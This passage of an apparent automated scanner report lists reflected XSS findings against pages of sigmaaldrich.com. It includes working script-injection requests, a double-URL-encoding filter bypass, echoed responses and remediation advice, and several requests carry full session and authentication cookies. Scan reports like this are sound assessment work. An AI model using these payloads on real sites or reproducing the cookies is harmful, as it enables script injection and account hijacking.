fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:45 GMT
Content-Length: 28940
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-science43b7f";alert(1)//55e6c486fe4/nanomaterials.html","E404") ;
   </script>
...[SNIP]...

1.595. http://www.sigmaaldrich.com/materials-science/nanomaterials.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/nanomaterials.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9bc9f%2522%253balert%25281%2529%252f%252f37a261964dd was submitted in the REST URL parameter 2. This input was echoed as 9bc9f";alert(1)//37a261964dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-science/9bc9f%2522%253balert%25281%2529%252f%252f37a261964dd HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:47 GMT
Content-Length: 28922
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-science/9bc9f";alert(1)//37a261964dd","E404") ;
   </script>
...[SNIP]...

1.596. http://www.sigmaaldrich.com/materials-science/nanotechnology.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/nanotechnology.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb39c%2522%253balert%25281%2529%252f%252f62ffd01fc59 was submitted in the REST URL parameter 1. This input was echoed as eb39c";alert(1)//62ffd01fc59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-scienceeb39c%2522%253balert%25281%2529%252f%252f62ffd01fc59/nanotechnology.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:46 GMT
Content-Length: 28941
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-scienceeb39c";alert(1)//62ffd01fc59/nanotechnology.html","E404") ;
   </script>
...[SNIP]...

1.597. http://www.sigmaaldrich.com/materials-science/nanotechnology.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/nanotechnology.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b27e5%2522%253balert%25281%2529%252f%252f3a3fdeb40e2 was submitted in the REST URL parameter 2. This input was echoed as b27e5";alert(1)//3a3fdeb40e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-science/b27e5%2522%253balert%25281%2529%252f%252f3a3fdeb40e2 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:48 GMT
Content-Length: 28922
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-science/b27e5";alert(1)//3a3fdeb40e2","E404") ;
   </script>
...[SNIP]...

1.598. http://www.sigmaaldrich.com/materials-science/organic-electronics.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/organic-electronics.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8ef8%2522%253balert%25281%2529%252f%252f3614c459a1c was submitted in the REST URL parameter 1. This input was echoed as b8ef8";alert(1)//3614c459a1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-scienceb8ef8%2522%253balert%25281%2529%252f%252f3614c459a1c/organic-electronics.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:46 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-scienceb8ef8";alert(1)//3614c459a1c/organic-electronics.html","E404") ;
   </script>
...[SNIP]...

1.599. http://www.sigmaaldrich.com/materials-science/organic-electronics.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/organic-electronics.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 198bd%2522%253balert%25281%2529%252f%252fcca3778b57c was submitted in the REST URL parameter 2. This input was echoed as 198bd";alert(1)//cca3778b57c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-science/198bd%2522%253balert%25281%2529%252f%252fcca3778b57c HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:48 GMT
Content-Length: 28922
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-science/198bd";alert(1)//cca3778b57c","E404") ;
   </script>
...[SNIP]...

1.600. http://www.sigmaaldrich.com/materials-science/polymer-science.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/polymer-science.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aaca7%2522%253balert%25281%2529%252f%252fe57571f4744 was submitted in the REST URL parameter 1. This input was echoed as aaca7";alert(1)//e57571f4744 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-scienceaaca7%2522%253balert%25281%2529%252f%252fe57571f4744/polymer-science.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:47 GMT
Content-Length: 28942
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-scienceaaca7";alert(1)//e57571f4744/polymer-science.html","E404") ;
   </script>
...[SNIP]...

1.601. http://www.sigmaaldrich.com/materials-science/polymer-science.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/polymer-science.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77bea%2522%253balert%25281%2529%252f%252fbafea584e76 was submitted in the REST URL parameter 2. This input was echoed as 77bea";alert(1)//bafea584e76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /materials-science/77bea%2522%253balert%25281%2529%252f%252fbafea584e76 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:49 GMT
Content-Length: 28922
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/materials-science/77bea";alert(1)//bafea584e76","E404") ;
   </script>
...[SNIP]...

1.602. http://www.sigmaaldrich.com/materials-science/renewable-alternative-energy.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /materials-science/renewable-alternative-energy.html

Issue detail

